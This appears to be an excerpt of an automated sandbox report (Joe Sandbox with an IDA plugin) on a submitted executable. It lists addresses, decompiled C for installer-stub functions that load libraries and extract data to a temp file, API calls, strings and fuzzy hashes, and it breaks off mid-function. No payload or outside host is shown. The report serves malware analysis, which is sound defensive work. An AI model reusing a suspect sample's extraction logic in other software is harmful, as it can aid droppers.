                      0x00406573
                      0x00406573
                      0x00406577
                      0x0040689e
                      0x00000000
                      0x0040689e
                      0x0040657d
                      0x00406580
                      0x00406583
                      0x00406587
                      0x0040658a
                      0x00406590
                      0x00406592
                      0x00406592
                      0x00406592
                      0x00406595
                      0x00000000
                      0x00000000
                      0x00406343
                      0x00406343
                      0x00406346
                      0x00000000
                      0x00000000
                      0x00406682
                      0x00406686
                      0x004066a8
                      0x004066ab
                      0x004066b5
                      0x00000000
                      0x004066b5
                      0x00406688
                      0x0040668b
                      0x0040668f
                      0x00406692
                      0x00406692
                      0x00406695
                      0x00000000
                      0x00000000
                      0x0040673f
                      0x00406743
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406768
                      0x0040676f
                      0x00406776
                      0x00406776
                      0x00000000
                      0x00406776
                      0x00406745
                      0x00406748
                      0x0040674b
                      0x0040674e
                      0x00406755
                      0x00406699
                      0x00406699
                      0x0040669c
                      0x00000000
                      0x00000000
                      0x00406830
                      0x00406833
                      0x00000000
                      0x00000000
                      0x0040646a
                      0x0040646c
                      0x00406473
                      0x00406474
                      0x00406476
                      0x00406479
                      0x00000000
                      0x00000000
                      0x00406481
                      0x00406484
                      0x00406487
                      0x00406489
                      0x0040648b
                      0x0040648b
                      0x0040648c
                      0x0040648f
                      0x00406496
                      0x00406499
                      0x004064a7
                      0x00000000
                      0x00000000
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x00000000
                      0x0040678c
                      0x0040678c
                      0x00406790
                      0x004068c8
                      0x00000000
                      0x004068c8
                      0x00406796
                      0x00406799
                      0x0040679c
                      0x004067a0
                      0x004067a3
                      0x004067a9
                      0x004067ab
                      0x004067ab
                      0x004067ab
                      0x004067ae
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b4
                      0x004067b4
                      0x004067b8
                      0x00406818
                      0x0040681b
                      0x00406820
                      0x00406821
                      0x00406823
                      0x00406825
                      0x00406828
                      0x00000000
                      0x00406828
                      0x004067ba
                      0x004067c0
                      0x004067c3
                      0x004067c6
                      0x004067c9
                      0x004067cc
                      0x004067cf
                      0x004067d2
                      0x004067d5
                      0x004067d8
                      0x004067db
                      0x004067f4
                      0x004067f7
                      0x004067fa
                      0x004067fd
                      0x00406801
                      0x00406803
                      0x00406803
                      0x00406804
                      0x00406807
                      0x004067dd
                      0x004067dd
                      0x004067e5
                      0x004067ea
                      0x004067ec
                      0x004067ef
                      0x004067ef
                      0x0040680a
                      0x00406811
                      0x00000000
                      0x00406813
                      0x00000000
                      0x00406813
                      0x00000000
                      0x004064af
                      0x004064b2
                      0x004064e8
                      0x00406618
                      0x00406618
                      0x00406618
                      0x00406618
                      0x0040661b
                      0x0040661b
                      0x0040661e
                      0x00406620
                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004063bc
                      0x004063bc
                      0x004063c0
                      0x00406886
                      0x00000000
                      0x00406886
                      0x004063c6
                      0x004063c9
                      0x004063cc
                      0x004063cf
                      0x004063d1
                      0x004063d1
                      0x004063d1
                      0x004063d4
                      0x004063d7
                      0x004063da
                      0x004063dd
                      0x004063e0
                      0x004063e3
                      0x004063e4
                      0x004063e6
                      0x004063e6
                      0x004063e6
                      0x004063e9
                      0x004063ec
                      0x004063ef
                      0x004063f2
                      0x004063f2
                      0x004063f2
                      0x004063f5
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x00000000
                      0x0040667d
                      0x0040667b
                      0x004068b0
                      0x00000000
                      0x00000000
                      0x00405edf

                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                      • Instruction ID: f98c46a7d4a45b1e93054ee16d037c4b99b117d06cd84a33c86e8ff0b6c30e47
                      • Opcode Fuzzy Hash: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                      • Instruction Fuzzy Hash: 83F18771D00229CBDF18DFA8C8946ADBBB1FF44305F25816ED856BB281D3785A86CF44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00405D7C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 630 405d7c-405d90 FindFirstFileA 631 405d92-405d9b FindClose 630->631 632 405d9d 630->632 633 405d9f-405da0 631->633 632->633
                      C-Code - Quality: 100%
                      			E00405D7C(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224e8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224e8;
			}




                      0x00405d87
                      0x00405d90
                      0x00000000
                      0x00405d9d
                      0x00405d93
                      0x00000000

                      APIs
                      • FindFirstFileA.KERNELBASE(?,004224E8,004218A0,0040569C,004218A0,004218A0,00000000,004218A0,004218A0,?,?,74E5F560,004053BE,?,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,74E5F560), ref: 00405D87
                      • FindClose.KERNEL32(00000000), ref: 00405D93
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: Find$CloseFileFirst
                      • String ID: $B
                      • API String ID: 2295610775-2366330246
                      • Opcode ID: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                      • Instruction ID: 8877f450b99b184e504413f9ffa66f4d164bf9bd4a7d07bd52ad5b53af664480
                      • Opcode Fuzzy Hash: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                      • Instruction Fuzzy Hash: 84D012319595306BC75127386D0C84B7A59DF15331750CA33F02AF22F0D3748C518AAD
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00405DA3, Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00405DA3(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409218);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x40921c));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                      0x00405dab
                      0x00405dae
                      0x00405db5
                      0x00405dbd
                      0x00405dca
                      0x00000000
                      0x00405dd1
                      0x00405dc0
                      0x00405dc8
                      0x00000000
                      0x00000000
                      0x00405dd9

                      APIs
                      • GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                      • LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                      • GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: AddressHandleLibraryLoadModuleProc
                      • String ID:
                      • API String ID: 310444273-0
                      • Opcode ID: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                      • Instruction ID: 37252885b6730f192407f0687863edf929784b14cf5d3781349e011cb12c2895
                      • Opcode Fuzzy Hash: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                      • Instruction Fuzzy Hash: F7E0C232A04610ABC6114B709D489BB77BCEFE9B41300897EF545F6290C734AC229FFA
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004035E3, Relevance: 52.7, APIs: 15, Strings: 15, Instructions: 213stringregistrylibraryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 108 4035e3-4035fb call 405da3 111 4035fd-40360d call 4059e3 108->111 112 40360f-403636 call 40596c 108->112 121 403659-403678 call 403897 call 405659 111->121 117 403638-403649 call 40596c 112->117 118 40364e-403654 lstrcatA 112->118 117->118 118->121 126 40367e-403683 121->126 127 4036ff-403707 call 405659 121->127 126->127 128 403685-4036a9 call 40596c 126->128 133 403715-40373a LoadImageA 127->133 134 403709-403710 call 405aa7 127->134 128->127 135 4036ab-4036ad 128->135 137 403740-403776 RegisterClassA 133->137 138 4037c9-4037d1 call 40140b 133->138 134->133 139 4036be-4036ca lstrlenA 135->139 140 4036af-4036bc call 4055a3 135->140 141 40377c-4037c4 SystemParametersInfoA CreateWindowExA 137->141 142 40388d 137->142 149 4037d3-4037d6 138->149 150 4037db-4037e6 call 403897 138->150 146 4036f2-4036fa call 405578 call 405a85 139->146 147 4036cc-4036da lstrcmpiA 139->147 140->139 141->138 144 40388f-403896 142->144 146->127 147->146 153 4036dc-4036e6 GetFileAttributesA 147->153 149->144 161 403864-40386c call 404ef5 150->161 162 4037e8-403805 ShowWindow LoadLibraryA 150->162 156 4036e8-4036ea 153->156 157 4036ec-4036ed call 4055bf 153->157 156->146 156->157 157->146 170 403886-403888 call 40140b 161->170 171 40386e-403874 161->171 163 403807-40380c LoadLibraryA 162->163 164 40380e-403820 GetClassInfoA 162->164 163->164 166 403822-403832 GetClassInfoA RegisterClassA 164->166 167 403838-403862 DialogBoxParamA call 40140b 164->167 166->167 167->144 170->142 171->149 174 40387a-403881 call 40140b 171->174 174->149
                      C-Code - Quality: 96%
                      			E004035E3() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t59;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				struct HINSTANCE__* _t75;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t85;

				_t80 =  *0x423eb0; // 0x4de368
				_t20 = E00405DA3(6);
				_t87 = _t20;
				if(_t20 == 0) {
					_t78 = 0x420498;
					"1033" = 0x7830;
					E0040596C(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420498, 0);
					__eflags =  *0x420498;
					if(__eflags == 0) {
						E0040596C(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420498, 0);
					}
					lstrcatA("1033", _t78);
				} else {
					E004059E3("1033",  *_t20() & 0x0000ffff);
				}
				E00403897(_t75, _t87);
				_t24 =  *0x423eb8; // 0x80
				_t84 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x423f20 = _t24 & 0x00000020;
				if(E00405659(_t87, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405659(_t95, _t84) == 0) {
						E00405AA7(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
					}
					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423688 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403897(_t75, __eflags);
							__eflags =  *0x423f40; // 0x0
							if(__eflags != 0) {
								_t31 = E00404EF5(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42366c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420470, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x423640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423640);
								 *0x423664 = _t85;
								RegisterClassA(0x423640);
							}
							_t39 =  *0x423680; // 0x0
							_t42 = DialogBoxParamA( *0x423ea0, _t39 + 0x00000069 & 0x0000ffff, 0, E00403964, 0);
							E0040140B(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x423ea0; // 0x400000
						 *0x423654 = _t28;
						_v20 = 0x624e5f;
						 *0x423644 = E00401000;
						 *0x423650 = _t75;
						 *0x423664 =  &_v20;
						if(RegisterClassA(0x423640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420470 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t59 =  *0x423ed8; // 0x4e2694
					_t78 = 0x422e40;
					E0040596C( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) + _t59, 0x422e40, 0);
					_t61 =  *0x422e40; // 0x62
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x422e41;
						 *((char*)(E004055A3(0x422e41, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
						L15:
						E00405A85(_t84, E00405578(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E004055BF(_t78);
							goto L15;
						}
						_t95 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























                      0x004035e9
                      0x004035f2
                      0x004035f9
                      0x004035fb
                      0x0040360f
                      0x00403621
                      0x0040362b
                      0x00403630
                      0x00403636
                      0x00403649
                      0x00403649
                      0x00403654
                      0x004035fd
                      0x00403608
                      0x00403608
                      0x00403659
                      0x0040365e
                      0x00403663
                      0x0040366c
                      0x00403678
                      0x004036ff
                      0x00403707
                      0x00403710
                      0x00403710
                      0x00403726
                      0x0040372c
                      0x0040373a
                      0x004037c9
                      0x004037d1
                      0x004037db
                      0x004037e0
                      0x004037e6
                      0x00403865
                      0x0040386a
                      0x0040386c
                      0x00403888
                      0x00000000
                      0x00403888
                      0x0040386e
                      0x00403874
                      0x0040387c
                      0x0040387c
                      0x00000000
                      0x00403874
                      0x004037f0
                      0x00403801
                      0x00403803
                      0x00403805
                      0x0040380c
                      0x0040380c
                      0x00403814
                      0x0040381c
                      0x0040381e
                      0x00403820
                      0x00403829
                      0x0040382c
                      0x00403832
                      0x00403832
                      0x00403838
                      0x00403851
                      0x0040385b
                      0x00000000
                      0x00403860
                      0x004037d3
                      0x004037d5
                      0x00000000
                      0x00403740
                      0x00403740
                      0x00403746
                      0x00403750
                      0x00403758
                      0x00403762
                      0x00403768
                      0x00403776
                      0x0040388d
                      0x0040388d
                      0x00000000
                      0x0040388d
                      0x0040377c
                      0x00403785
                      0x004037c4
                      0x00000000
                      0x004037c4
                      0x0040367e
                      0x0040367e
                      0x00403683
                      0x00000000
                      0x00000000
                      0x00403688
                      0x0040368d
                      0x0040369d
                      0x004036a2
                      0x004036a9
                      0x00000000
                      0x00000000
                      0x004036ad
                      0x004036af
                      0x004036bc
                      0x004036bc
                      0x004036c4
                      0x004036ca
                      0x004036f2
                      0x004036fa
                      0x00000000
                      0x004036dc
                      0x004036dd
                      0x004036e6
                      0x004036ec
                      0x004036ed
                      0x00000000
                      0x004036ed
                      0x004036e8
                      0x004036ea
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004036ea
                      0x004036ca

                      APIs
                        • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                        • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                        • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                      • lstrcatA.KERNEL32(1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403654
                      • lstrlenA.KERNEL32(bxrmcpz,?,?,?,bxrmcpz,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ), ref: 004036BF
                      • lstrcmpiA.KERNEL32(?,.exe,bxrmcpz,?,?,?,bxrmcpz,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000), ref: 004036D2
                      • GetFileAttributesA.KERNEL32(bxrmcpz), ref: 004036DD
                      • LoadImageA.USER32 ref: 00403726
                        • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                      • RegisterClassA.USER32 ref: 0040376D
                      • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403785
                      • CreateWindowExA.USER32 ref: 004037BE
                      • ShowWindow.USER32(00000005,00000000), ref: 004037F0
                      • LoadLibraryA.KERNEL32(RichEd20), ref: 00403801
                      • LoadLibraryA.KERNEL32(RichEd32), ref: 0040380C
                      • GetClassInfoA.USER32 ref: 0040381C
                      • GetClassInfoA.USER32 ref: 00403829
                      • RegisterClassA.USER32 ref: 00403832
                      • DialogBoxParamA.USER32 ref: 00403851
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                      • String ID: "C:\Users\user\Desktop\nji3Lg1ot6.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$bxrmcpz$hM
                      • API String ID: 914957316-2201983962
                      • Opcode ID: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                      • Instruction ID: 5423f1521edd6c22147bc7c07d225ef67cd2e9978b4dd0bca8e1ac87d1580d65
                      • Opcode Fuzzy Hash: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                      • Instruction Fuzzy Hash: 3A61C0B1644200BED6306F65AC45E3B3AADEB4474AF44457FF940B22E1C77DAD058A2E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00402C5B, Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 203memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 177 402c5b-402ca9 GetTickCount GetModuleFileNameA call 40575c 180 402cb5-402ce3 call 405a85 call 4055bf call 405a85 GetFileSize 177->180 181 402cab-402cb0 177->181 189 402dd3-402de1 call 402bc5 180->189 190 402ce9-402d00 180->190 182 402efa-402efe 181->182 197 402eb2-402eb7 189->197 198 402de7-402dea 189->198 191 402d02 190->191 192 402d04-402d0a call 4031a8 190->192 191->192 196 402d0f-402d11 192->196 199 402d17-402d1d 196->199 200 402e6e-402e76 call 402bc5 196->200 197->182 201 402e16-402e62 GlobalAlloc call 405e7d call 40578b CreateFileA 198->201 202 402dec-402dfd call 4031da call 4031a8 198->202 204 402d9d-402da1 199->204 205 402d1f-402d37 call 40571d 199->205 200->197 228 402e64-402e69 201->228 229 402e78-402ea8 call 4031da call 402f01 201->229 220 402e02-402e04 202->220 209 402da3-402da9 call 402bc5 204->209 210 402daa-402db0 204->210 205->210 223 402d39-402d40 205->223 209->210 216 402db2-402dc0 call 405e0f 210->216 217 402dc3-402dcd 210->217 216->217 217->189 217->190 220->197 225 402e0a-402e10 220->225 223->210 227 402d42-402d49 223->227 225->197 225->201 227->210 230 402d4b-402d52 227->230 228->182 236 402ead-402eb0 229->236 230->210 233 402d54-402d5b 230->233 233->210 235 402d5d-402d7d 233->235 235->197 237 402d83-402d87 235->237 236->197 238 402eb9-402eca 236->238 239 402d89-402d8d 237->239 240 402d8f-402d97 237->240 242 402ed2-402ed7 238->242 243 402ecc 238->243 239->189 239->240 240->210 241 402d99-402d9b 240->241 241->210 244 402ed8-402ede 242->244 243->242 244->244 245 402ee0-402ef8 call 40571d 244->245 245->182
                      C-Code - Quality: 96%
                      			E00402C5B(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				signed int _t54;
				void* _t57;
				void* _t62;
				signed int _t63;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t79;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t101;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423eac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\nji3Lg1ot6.exe", 0x400);
				_t105 = E0040575C("C:\\Users\\hardz\\Desktop\\nji3Lg1ot6.exe", 0x80000000, 3);
				 *0x409010 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405A85("C:\\Users\\hardz\\Desktop", "C:\\Users\\hardz\\Desktop\\nji3Lg1ot6.exe");
				E00405A85(0x42b000, E004055BF("C:\\Users\\hardz\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				__eflags = _t54;
				 *0x41f048 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BC5(1);
					__eflags =  *0x423eb4; // 0x7e00
					if(__eflags == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00405E7D(0x40afb0);
						E0040578B( &_v300, "C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x409014 = _t62;
						if(_t62 != 0xffffffff) {
							_t63 =  *0x423eb4; // 0x7e00
							_t65 = E004031DA(_t63 + 0x1c);
							 *0x41f04c = _t65;
							 *0x417040 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F01(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x423eb0 = _t110;
								 *0x423eb8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423ebc =  *0x423ebc + 1;
									__eflags =  *0x423ebc;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
									__eflags = _t101;
								} while (_t101 != 0);
								_t71 =  *0x41703c; // 0x3d90c
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E0040571D(0x423ec0, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031DA( *0x417038);
					_t77 = E004031A8( &_a4, 4); // executed
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t79 =  *0x423eb4; // 0x7e00
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~_t79 & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031A8(0x417048, _t106); // executed
						__eflags = _t83;
						if(_t83 == 0) {
							E00402BC5(1);
							L30:
